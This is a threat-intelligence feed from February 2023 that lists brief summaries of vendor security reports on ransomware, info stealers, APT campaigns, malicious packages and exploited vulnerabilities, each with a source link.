2023-02-28
Impact:
LOW
Summary:
ASEC researchers have identified that Magniber ransomware is being distributed as a Windows installer package file (.msi) through the Edge and Chrome browsers.
Source: https://asec.ahnlab.com/en/48312/
2023-02-28
ChatGPT_Based_Phishing_Attacks
MEDIUM
Intel Source:
Cyble
Intel Name:
ChatGPT_Based_Phishing_Attacks
Date of Scan:
2023-02-28
Impact:
MEDIUM
Summary:
Cyble researchers have detected several phishing websites that are being promoted through a fraudulent OpenAI social media page to spread various types of malware. Furthermore, several phishing sites are impersonating ChatGPT to steal credit card information.
Source: https://blog.cyble.com/2023/02/22/the-growing-threat-of-chatgpt-based-phishing-attacks/
2023-02-27
Lazarus_Group_Using_New_WinorDLL64_Backdoor
MEDIUM
+
Intel Source:
WeliveSecurity
Intel Name:
Lazarus_Group_Using_New_WinorDLL64_Backdoor
Date of Scan:
2023-02-27
Impact:
MEDIUM
Summary:
WeLiveSecurity researchers have observed one of the payloads of the Wslink downloader that was discovered back in 2021. That payload was named WinorDLL64 based on its filename, WinorDLL64.dll. Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that runs as a server and executes received modules in memory.
Source: https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/
2023-02-27
New_Hacking_Group_Clasiopa_Targeting_Materials_Research
MEDIUM
+
Intel Source:
Symantec
Intel Name:
New_Hacking_Group_Clasiopa_Targeting_Materials_Research
Date of Scan:
2023-02-27
Impact:
MEDIUM
Summary:
Symantec researchers have identified that an unknown threat actor is targeting materials research organizations in Asia with a distinct set of tools.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
2023-02-27
Hackers_Targeting_Multiple_ManageEngine_Products
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Hackers_Targeting_Multiple_ManageEngine_Products
Date of Scan:
2023-02-27
Impact:
MEDIUM
Summary:
Researchers from BitDefender have observed that multiple threat actors opportunistically weaponized a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Additional Blog link: https://www.bitdefender.com/blog/labs/weaponizing-pocs-a-targeted-attack-using-cve-2022-47966/
Source: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966
2023-02-27
I2Pminer_Variant_Targeting_MacOS
LOW
+
Intel Source:
Crowdstrike & Jamf
Intel Name:
I2Pminer_Variant_Targeting_MacOS
Date of Scan:
2023-02-27
Impact:
LOW
Summary:
CrowdStrike and Jamf researchers have analyzed a macOS-targeted mineware campaign that utilized malicious application bundles to deliver open source XMRig cryptomining software and Invisible Internet Protocol (I2P) network tooling.
Source: https://www.crowdstrike.com/blog/i2pminer-macos-mineware-analysis/ https://www.jamf.com/blog/cryptojacking-macos-malware-discovered-by-jamf-threat-labs/
2023-02-24
NPM_Packages_Distributing_Phishing_Links
LOW
+
Intel Source:
Checkmarx
Intel Name:
NPM_Packages_Distributing_Phishing_Links
Date of Scan:
2023-02-24
Impact:
LOW
Summary:
Checkmarx researchers have investigated and uncovered a recurring attack method, in which cyber attackers utilize spamming techniques to flood the open-source ecosystem with packages that include links to phishing campaigns in their README.md files.
Source: https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/
2023-02-23
PyPI_Packages_Mimicking_Popular_Libraries
LOW
+
Intel Source:
Reversing Labs
Intel Name:
PyPI_Packages_Mimicking_Popular_Libraries
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Reversing Labs researchers are warning of "imposter packages" mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3.
Source: https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi
2023-02-23
The_Investigation_of_8220_Gang_Cloud_Threat
LOW
+
Intel Source:
Sentinelone
Intel Name:
The_Investigation_of_8220_Gang_Cloud_Threat
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
SentinelOne researchers have analyzed the 8220 gang cloud threat as the group has again switched to new infrastructure and samples.
Source: https://www.sentinelone.com/blog/soc-team-essentials-how-to-investigate-and-track-the-8220-gang-cloud-threat/
2023-02-23
Credit_Card_Skimmers_Targeting_Ecommerce_Platforms
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Credit_Card_Skimmers_Targeting_Ecommerce_Platforms
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Researchers from Malwarebytes have observed credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/02/multilingual-skimmer-fingerprints-users-via-cloudflare-endpoint-api
2023-02-23
Attackers_Leveraging_Cron_Jobs_to_Infect_Websites
LOW
+
Intel Source:
Sucuri
Intel Name:
Attackers_Leveraging_Cron_Jobs_to_Infect_Websites
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Sucuri researchers have observed attackers using malicious cron jobs quite frequently to reinfect websites. Recently, they have seen a distinctive new wave of these infections.
Source: https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html
2023-02-23
Hackers_Targeting_Innorix_Agent_Vulnerable_Versions
LOW
+
Intel Source:
ASEC
Intel Name:
Hackers_Targeting_Innorix_Agent_Vulnerable_Versions
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Researchers from ASEC have discovered the distribution of malware targeting users with vulnerable versions of Innorix Agent; the collected malware is a backdoor that attempts to connect to a C&C server.
Source: https://asec.ahnlab.com/en/48198/
2023-02-23
A_New_InfoStealer_Stealc
LOW
+
Intel Source:
Sekoia
Intel Name:
A_New_InfoStealer_Stealc
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Sekoia researchers have identified a new info stealer during routine Dark Web monitoring. The information stealer is advertised as Stealc by its alleged developer, going by the handle Plymouth. The threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on the Vidar, Raccoon, Mars, and Redline stealers.
Source: https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/
2023-02-23
Lazarus_Group_Leveraging_Anti_Forensic_Techniques
LOW
+
Intel Source:
ASEC
Intel Name:
Lazarus_Group_Leveraging_Anti_Forensic_Techniques
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
ASEC researchers have shared the anti-forensic traces and details found in the systems that were infiltrated by the Lazarus group.
Source: https://asec.ahnlab.com/en/48223/
2023-02-23
The_New_Version_of_HardBit_2_0_Ransomware
LOW
+
Intel Source:
Varonis
Intel Name:
The_New_Version_of_HardBit_2_0_Ransomware
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Researchers from Varonis have identified a new version of HardBit ransomware, HardBit 2.0, which is still under development and features unique capabilities.
Source: https://www.varonis.com/blog/hardbit-2.0-ransomware
2023-02-23
Techniques_Analysis_of_Rhadamanthys_information_stealer
LOW
+
Intel Source:
Zscaler
Intel Name:
Techniques_Analysis_of_Rhadamanthys_information_stealer
Date of Scan:
2023-02-23
Impact:
LOW
Summary:
Zscaler researchers have analyzed Rhadamanthys, an information stealer. The malware implements complex anti-analysis techniques by using a public open source library. It is written in C++ and is being distributed mostly via malicious Google advertisements. The malware is designed to steal credentials from web browsers, VPN clients, email clients and chat clients, as well as cryptocurrency wallets.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques
2023-02-22
VMWare_ESXi_Vulnerability_targeted_by_ESXiArgs_Ransomware
MEDIUM
+
Intel Source:
Securityscorecard
Intel Name:
VMWare_ESXi_Vulnerability_targeted_by_ESXiArgs_Ransomware
Date of Scan:
2023-02-22
Impact:
MEDIUM
Summary:
After warning of a widespread ransomware campaign exploiting CVE-2021-21974, a VMware ESXi vulnerability, the SecurityScorecard Threat Research Team began analyzing this new campaign in response to the advisories and discovered possible communication between target IP addresses and infrastructure involved in the exploitation of this vulnerability.
Source: https://securityscorecard.com/research/esxiargs-ransomware-campaign-targets-vmware-esxi-vulnerability/
2023-02-22
A_new_threat_group_Hydrochasma_targets_organizations_in_Asia
LOW
+
Intel Source:
Symantec
Intel Name:
A_new_threat_group_Hydrochasma_targets_organizations_in_Asia
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
Researchers from Symantec have observed a new threat group, Hydrochasma, attacking shipping companies and medical laboratories in Asia. Hydrochasma has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines. The possible infection vector used by Hydrochasma was a phishing email.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence-gathering
2023-02-22
Expansion_of_attackes_on_Linux_ESXi_Servers_by_Royal_ransomware
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Expansion_of_attackes_on_Linux_ESXi_Servers_by_Royal_ransomware
Date of Scan:
2023-02-22
Impact:
MEDIUM
Summary:
TrendMicro analysts predicted last year that ransomware groups would increasingly target Linux servers and embedded systems in the coming years, after detecting a double-digit year-on-year (YoY) increase in attacks on these systems. A new Royal ransomware variant targeting Linux systems has emerged, and TrendMicro shared their technical analysis of this variant in their blog.
Source: https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html
2023-02-22
STL_Investigation_222
LOW
+
Intel Source:
SecuronixThreatLabs
Intel Name:
STL_Investigation_222
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
Indicators of Compromise related to a Securonix Threat Labs investigation
Source: http://www.SecuronixThreatLabs.com
2023-02-22
The_Examination_of_DarkCloud_Stealer
LOW
+
Intel Source:
Cyble
Intel Name:
The_Examination_of_DarkCloud_Stealer
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
Cyble researchers have observed an increase in the prevalence of DarkCloud Stealer, with Threat Actors employing various spam campaigns to disseminate this malware worldwide.
Source: https://blog.cyble.com/2023/02/20/decoding-the-inner-workings-of-darkcloud-stealer/
2023-02-22
Raccoon_Stealer_V2_Using_Microsoft_Add_Ins_to_Delivering_Malware
MEDIUM
+
Intel Source:
Quickheal
Intel Name:
Raccoon_Stealer_V2_Using_Microsoft_Add_Ins_to_Delivering_Malware
Date of Scan:
2023-02-22
Impact:
MEDIUM
Summary:
Researchers from QuickHeal have identified that Microsoft Add-Ins can present a potential threat vector for malware like Raccoon Stealer V2. These types of malware are designed to steal sensitive information from infected systems and use Microsoft Add-Ins as a means of delivering the malware to target systems.
Source: https://blogs.quickheal.com/your-office-document-is-at-risk-xll-a-new-attack-vector/
2023-02-22
HWP_Malware_Using_the_Steganography_Technique
LOW
+
Intel Source:
ASEC
Intel Name:
HWP_Malware_Using_the_Steganography_Technique
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
ASEC researchers have discovered that the RedEyes threat group is distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291).
Source: https://asec.ahnlab.com/en/48063/
2023-02-22
Qakbot_Distributing_via_OneNote
LOW
+
Intel Source:
Cyble
Intel Name:
Qakbot_Distributing_via_OneNote
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
Cyble researchers have identified multiple distribution methods for the widely known banking trojan Qakbot and these methods include using malspam with OneNote attachments, malspam with zip files containing WSF, and others.
Source: https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/
2023-02-22
Analysis_of_Icarus_Stealer
LOW
+
Intel Source:
Esentire
Intel Name:
Analysis_of_Icarus_Stealer
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
eSentire researchers have analyzed the Icarus stealer malware, covering the technical details of how the malware operates and security recommendations to protect organizations from it.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-icarus-stealer
2023-02-22
ReverseRAT_Backdoor_Targeting_Indian_Government_Agencies
MEDIUM
+
Intel Source:
ThreatMon
Intel Name:
ReverseRAT_Backdoor_Targeting_Indian_Government_Agencies
Date of Scan:
2023-02-22
Impact:
MEDIUM
Summary:
Researchers from ThreatMon have observed a spear-phishing campaign targeting Indian government entities that aim to deploy an updated version of a backdoor called ReverseRAT.
Source: https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/
2023-02-22
Return_of_Redline_Stealer
LOW
+
Intel Source:
SocInvestigation
Intel Name:
Return_of_Redline_Stealer
Date of Scan:
2023-02-22
Impact:
LOW
Summary:
SOC Investigation researchers discussed the Redline Stealer malware in their blog: its background, its capabilities, its impact, and an outline of the malware's basic steps.
Source: https://www.socinvestigation.com/redline-stealer-returns-with-new-ttps-detection-response/
2023-02-21
The_Deep_Examination_of_CatB_Ransomware
LOW
+
Intel Source:
Fortinet
Intel Name:
The_Deep_Examination_of_CatB_Ransomware
Date of Scan:
2023-02-21
Impact:
LOW
Summary:
Fortinet researchers have analyzed the CatB ransomware. It is a reasonably new entrant to the ransomware field, with samples only dating back to December 2022.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-catb-ransomware
2023-02-21
Royal_Ransomware_Targeting_Linux_ESXi_Servers
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Royal_Ransomware_Targeting_Linux_ESXi_Servers
Date of Scan:
2023-02-21
Impact:
MEDIUM
Summary:
TrendMicro researchers have observed that Royal ransomware is expanding its targets by increasingly developing Linux-based versions.
Source: https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html
2023-02-20
WordPress_Sites_Backdoored_With_Ad_Fraud_Plugin
LOW
+
Intel Source:
Malwarebytes
Intel Name:
WordPress_Sites_Backdoored_With_Ad_Fraud_Plugin
Date of Scan:
2023-02-20
Impact:
LOW
Summary:
Malwarebytes researchers have identified around 50 WordPress blogs that have been backdoored with a plugin called fuser-master.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/02/wordpress-sites-backdoored-with-ad-fraud-plugin
2023-02-20
Hackers_Targeting_Security_Service_of_Ukraine_and_NATO_Allies
LOW
+
Intel Source:
Eclecticiq
Intel Name:
Hackers_Targeting_Security_Service_of_Ukraine_and_NATO_Allies
Date of Scan:
2023-02-20
Impact:
LOW
Summary:
EclecticIQ researchers have observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation.
Source: https://blog.eclecticiq.com/three-cases-of-cyber-attacks-on-the-security-service-of-ukraine-and-nato-allies-likely-by-russian-state-sponsored-gamaredon
2023-02-20
BlackCat_Ransomware_Group_Targeting_Healthcare_Service_Provider
LOW
+
Intel Source:
SecurityScoreCard
Intel Name:
BlackCat_Ransomware_Group_Targeting_Healthcare_Service_Provider
Date of Scan:
2023-02-20
Impact:
LOW
Summary:
Security ScoreCard researchers have observed BlackCat ransomware group adding an entry for an electronic health record (EHR) vendor to its extortion site.
Source: https://securityscorecard.com/research/blackcat-ransomware-group-claims-attack-on-healthcare-service-provider/
2023-02-20
The_Dangers_of_Installing_Nulled_WordPress_Themes_and_Plugins
LOW
+
Intel Source:
Sucuri
Intel Name:
The_Dangers_of_Installing_Nulled_WordPress_Themes_and_Plugins
Date of Scan:
2023-02-20
Impact:
LOW
Summary:
Researchers from Sucuri have identified installing nulled themes or plugins on the website is not only participating in software theft but can also introduce serious risks including malware, SEO spam, and website backdoors.
Source: https://blog.sucuri.net/2023/02/the-dangers-of-installing-nulled-wordpress-themes-and-plugins.html
2023-02-19
A_new_threat_cluster_WIP26
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
A_new_threat_cluster_WIP26
Date of Scan:
2023-02-19
Impact:
MEDIUM
Summary:
SentinelLabs has observed threat activity tracked as WIP26. This threat actor has been targeting telecommunication companies in the Middle East. WIP26 is known for abusing public cloud infrastructure – Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox – for malware delivery, data exfiltration, and C2 purposes.
Source: https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/
2023-02-18
DarkBit_Ransomware_Targeting_Israel
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
DarkBit_Ransomware_Targeting_Israel
Date of Scan:
2023-02-18
Impact:
MEDIUM
Summary:
BlackBerry researchers have identified a new ransomware strain dubbed "DarkBit" that has recently appeared on the threat landscape after targeting one of Israel's top research universities, Technion - Israel Institute of Technology (IIT).
Source: https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel
2023-02-18
From_Targeting_Attacks_to_widespread_Usage_of_Brute_Ratel
LOW
+
Intel Source:
Yoroi
Intel Name:
From_Targeting_Attacks_to_widespread_Usage_of_Brute_Ratel
Date of Scan:
2023-02-18
Impact:
LOW
Summary:
Researchers from Yoroi have identified and tracked security threats that involve actively searching for and analyzing potential security breaches or anomalies in an organization's systems and networks.
Source: https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/?&web_view=true
2023-02-18
Earth_Kitsune_Delivering_New_WhiskerSpy_Backdoor
LOW
+
Intel Source:
TrendMicro
Intel Name:
Earth_Kitsune_Delivering_New_WhiskerSpy_Backdoor
Date of Scan:
2023-02-18
Impact:
LOW
Summary:
TrendMicro researchers have discovered a new backdoor which they have attributed to the APT group known as Earth Kitsune. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.
Source: https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html
2023-02-18
Analysis_of_distribution_sites_of_Magniber_ransomware_using_EDR
LOW
+
Intel Source:
ASEC
Intel Name:
Analysis_of_distribution_sites_of_Magniber_ransomware_using_EDR
Date of Scan:
2023-02-18
Impact:
LOW
Summary:
ASEC researchers have identified that Magniber ransomware distribution continues, and they are tracking the distribution site URL through a different method.
Source: https://asec.ahnlab.com/en/47909/
2023-02-17
Dark_Caracal_APT_Back_with_New_Version_of_Bandook_Spyware
MEDIUM
+
Intel Source:
Lookout
Intel Name:
Dark_Caracal_APT_Back_with_New_Version_of_Bandook_Spyware
Date of Scan:
2023-02-17
Impact:
MEDIUM
Summary:
Researchers from Lookout have discovered that the Dark Caracal APT is currently using a new version of Bandook spyware to target Windows systems.
Source: https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf
2023-02-17
Mirai_Variant_V3G4_Targeting_IoT_Devices
LOW
+
Intel Source:
PaloAlto
Intel Name:
Mirai_Variant_V3G4_Targeting_IoT_Devices
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
Researchers from Palo Alto have observed that a Mirai variant called V3G4 is leveraging several vulnerabilities to spread itself. Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet.
Source: https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
2023-02-17
Hackers_From_RedEyes_Using_New_Malware_to_Steal_Data
LOW
+
Intel Source:
ASEC
Intel Name:
Hackers_From_RedEyes_Using_New_Malware_to_Steal_Data
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
ASEC researchers have identified that the APT37 threat group is using a new evasive 'M2RAT' malware and steganography to target individuals for intelligence collection.
Source: https://asec.ahnlab.com/ko/47622/
2023-02-17
ESXiArgs_Ransomware_Leveraging_Two_Year_Old_Vulnerability
LOW
+
Intel Source:
Trellix
Intel Name:
ESXiArgs_Ransomware_Leveraging_Two_Year_Old_Vulnerability
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
Trellix researchers have identified that the global ESXiArgs ransomware attack is riding on the back of a two-year-old vulnerability. The vulnerability the ransomware actors targeted is CVE-2021-21974, which allows an attacker to exploit the OpenSLP protocol if the affected server is exposed to the internet.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/global-esxiargs-ransomware-attack-on-the-back-of-a-two-year-old-vulnerability.html
2023-02-17
Earth_Yako_Group_is_Back
LOW
+
Intel Source:
TrendMicro
Intel Name:
Earth_Yako_Group_is_Back
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
Researchers from TrendMicro have investigated several incidents and observed the intrusion set introduced new tools and malware within a short period of time, frequently changing and expanding its attack targets. Security researchers believe that Earth Yako is still active and will keep targeting more organizations soon.
Source: https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html
2023-02-17
New_Malware_Abusing_Microsoft_IIS_Feature_to_Establish_Backdoor
MEDIUM
+
Intel Source:
Symantec
Intel Name:
New_Malware_Abusing_Microsoft_IIS_Feature_to_Establish_Backdoor
Date of Scan:
2023-02-17
Impact:
MEDIUM
Summary:
Researchers from Symantec have observed a new malware that abuses a feature of Microsoft’s Internet Information Services (IIS) to deploy a backdoor onto targeted systems.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis
2023-02-17
Malware_Campaign_Delivering_ProxyShellMiner_to_Windows_Endpoints
MEDIUM
+
Intel Source:
Morphisec
Intel Name:
Malware_Campaign_Delivering_ProxyShellMiner_to_Windows_Endpoints
Date of Scan:
2023-02-17
Impact:
MEDIUM
Summary:
Morphisec researchers have identified a highly evasive malware campaign delivering ProxyShellMiner to Windows endpoints. ProxyShellMiner exploits the ProxyShell vulnerabilities CVE-2021-34473 and CVE-2021-34523 in Windows Exchange servers for initial access and compromise of an organization to deliver crypto miners.
Source: https://blog.morphisec.com/proxyshellminer-campaign
2023-02-17
Trojanized_Installers_Targeting_Southeast_and_East_Asia
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Trojanized_Installers_Targeting_Southeast_and_East_Asia
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributing via malicious websites linked in ads that appear in Google search results.
Source: https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/
2023-02-17
The_Analysis_of_TZW_Ransomware
LOW
+
Intel Source:
Sentinelone
Intel Name:
The_Analysis_of_TZW_Ransomware
Date of Scan:
2023-02-17
Impact:
LOW
Summary:
SentinelOne researchers have analyzed the TZW ransomware in depth. They also observed that TZW ransomware is linked to a known malware family called GlobeImposter (sometimes referred to as LOLNEK or LOLKEK).
Source: https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/
2023-02-16
Microsoft_OneNote_Sample_Targeting_Cisco_VPN
LOW
+
Intel Source:
DOCGuard
Intel Name:
Microsoft_OneNote_Sample_Targeting_Cisco_VPN
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
Researchers from DOCGuard have identified that the Microsoft OneNote sample targeting Cisco VPN users bypasses all the antiviruses.
Source: https://twitter.com/doc_guard/status/1625872935595507713
2023-02-16
US_Public_Housing_Authority_ransomware_attack
LOW
+
Intel Source:
SecurityScoreCard
Intel Name:
US_Public_Housing_Authority_ransomware_attack
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
U.S. Public Housing Authority has announced a disruption, but has not elaborated on the nature of the event. The LockBit ransomware group, which has made false claims in the past, took responsibility for the incident.
Source: https://securityscorecard.com/research/ransomware-attack-against-u-s-public-housing-authority-linked-to-previous-attacks/
2023-02-16
Malware_Targeting_Security_Related_Workers
LOW
+
Intel Source:
ASEC
Intel Name:
Malware_Targeting_Security_Related_Workers
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
ASEC researchers have discovered that the malware is distributed to broadcasting and ordinary companies as well as those in the security-related field.
Source: https://asec.ahnlab.com/en/47585/
2023-02-16
LockBit_2_0_Ransomware_is_Back
MEDIUM
+
Intel Source:
ASEC
Intel Name:
LockBit_2_0_Ransomware_is_Back
Date of Scan:
2023-02-16
Impact:
MEDIUM
Summary:
ASEC researchers have identified that Lockbit 2.0 is being distributed in a MalPE format instead of the NSIS format.
Source: https://asec.ahnlab.com/en/47739/
2023-02-16
Paradise_Ransomware_Distributing_Through_AweSun_Vulnerability_Exploitation
LOW
+
Intel Source:
ASEC
Intel Name:
Paradise_Ransomware_Distributing_Through_AweSun_Vulnerability_Exploitation
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
ASEC researchers have discovered the distribution of Paradise ransomware and the threat actors are suspected to be utilizing vulnerability exploitation of the Chinese remote control program AweSun.
Source: https://asec.ahnlab.com/en/47590/
2023-02-16
Diving_Deep_into_DarkBit_Ransomware
LOW
+
Intel Source:
Cyble
Intel Name:
Diving_Deep_into_DarkBit_Ransomware
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
Cyble researchers have recently detected a sample of the DarkBit ransomware and analyzed its details.
Source: https://blog.cyble.com/2023/02/15/uncovering-the-dark-side-of-darkbit-ransomware/
2023-02-16
A_new_Havoc_campaign_targeting_a_Government_organization
LOW
+
Intel Source:
ZScaler
Intel Name:
A_new_Havoc_campaign_targeting_a_Government_organization
Date of Scan:
2023-02-16
Impact:
LOW
Summary:
The Zscaler ThreatLabz research team observed a new campaign targeting a government organization. The threat actors have been using a new Command & Control (C2) framework named Havoc. The team provided a technical analysis and overview of the recently discovered attack campaign targeting the government organization using Havoc, and revealed how it can be leveraged by threat actors in various campaigns.
Source: https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace
2023-02-15
Active_IOCs_of_Tofsee_Malware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Tofsee_Malware
Date of Scan:
2023-02-15
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Tofsee Malware. It has been around since 2016. Once installed on a compromised computer, it can be used to send spam emails and gather user data.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alerts-tofsee-malware-active-iocs
2023-02-15
New_Malware_That_Can_Fly_Under_the_Radar
LOW
+
Intel Source:
Minerva Labs
Intel Name:
New_Malware_That_Can_Fly_Under_the_Radar
Date of Scan:
2023-02-15
Impact:
LOW
Summary:
Researchers from Minerva Labs have identified a new piece of evasive malware dubbed Beep that's designed to fly under the radar and drop additional payloads onto a compromised host.
Source: https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/
2023-02-15
Qakbot_Malware_Distributing_via_OneNote
LOW
+
Intel Source:
ASEC
Intel Name:
Qakbot_Malware_Distributing_via_OneNote
Date of Scan:
2023-02-15
Impact:
LOW
Summary:
Researchers from ASEC have identified that Qakbot stopped using MS Office Macro, their past distribution method, and instead started to use OneNote to execute their malware.
Source: https://asec.ahnlab.com/en/47785/
2023-02-15
Pybot_DDoS_Distributing_With_Illegal_Software
LOW
+
Intel Source:
ASEC
Intel Name:
Pybot_DDoS_Distributing_With_Illegal_Software
Date of Scan:
2023-02-15
Impact:
LOW
Summary:
ASEC researchers have been monitoring malware that is being distributed through illegal software such as software cracks or serial keygens, and recently discovered Pybot DDoS being distributed with illegal software.
Source: https://asec.ahnlab.com/en/47789/
2023-02-15
A_Deep_Investigation_of_VMware_ESXi_Servers_Vulnerability
LOW
+
Intel Source:
BitDefender
Intel Name:
A_Deep_Investigation_of_VMware_ESXi_Servers_Vulnerability
Date of Scan:
2023-02-15
Impact:
LOW
Summary:
BitDefender researchers have investigated the VMware ESXi servers vulnerability which was targeted by Opportunistic Threat Actors and advised users to patch it immediately.
Source: https://businessinsights.bitdefender.com/technical-advisory-immediately-patch-your-vmware-esxi-servers-targeted-by-opportunistic-threat-actors
2023-02-15
Turkish_Earthquake_Leads_to_Fake_Donation_Schemes
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Turkish_Earthquake_Leads_to_Fake_Donation_Schemes
Date of Scan:
2023-02-15
Impact:
MEDIUM
Summary:
Researchers from Cyble have discovered various domains and IP addresses hosting websites that claim to be collecting funds to aid those affected by the earthquake in Turkey and Syria.
Source: https://blog.cyble.com/2023/02/13/increase-in-fake-donation-schemes-following-massive-earthquake-in-turkey/
2023-02-14
Diving_Deep_into_Mylobot
LOW
+
Intel Source:
BitSight
Intel Name:
Diving_Deep_into_Mylobot
Date of Scan:
2023-02-14
Impact:
LOW
Summary:
BitSight researchers have analyzed the Mylobot malware and focused on its main capability, which is transforming the infected system into a proxy.
Source: https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet
2023-02-14
Hackers_From_ChinaTargeting_GroupIB_Cybersecurity_Firm
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
Hackers_From_ChinaTargeting_GroupIB_Cybersecurity_Firm
Date of Scan:
2023-02-14
Impact:
MEDIUM
Summary:
Group-IB researchers have identified that an APT group known as Tonto Team has tried targeting the Singapore-based Group-IB cybersecurity firm for the second time.
Source: https://www.group-ib.com/blog/tonto-team/
2023-02-14
Hackers_Targeting_Ukraine_Using_Remote_Utility_Program
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Hackers_Targeting_Ukraine_Using_Remote_Utility_Program
Date of Scan:
2023-02-14
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified a cyber attack on organizations and institutions in Ukraine using the Remote Utilities program.
Source: https://cert.gov.ua/article/3863542
2023-02-13
The_Clop_Ransomware_Claims_to_Have_Breached_130_Organizations
MEDIUM
+
Intel Source:
Huntress
Intel Name:
The_Clop_Ransomware_Claims_to_Have_Breached_130_Organizations
Date of Scan:
2023-02-13
Impact:
MEDIUM
Summary:
Researchers from Huntress have identified that Clop ransomware gang claims to be behind recent attacks that exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool, saying they stole data from over 130 organizations.
Source: https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits
2023-02-13
Supply_Chain_Attack_by_New_Malicious_Python_Package
LOW
+
Intel Source:
Fortinet
Intel Name:
Supply_Chain_Attack_by_New_Malicious_Python_Package
Date of Scan:
2023-02-13
Impact:
LOW
Summary:
FortiGate researchers have identified five malicious packages on the Python Package Index (PyPI), stealing passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.
Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages-by-malware-author-core1337
2023-02-13
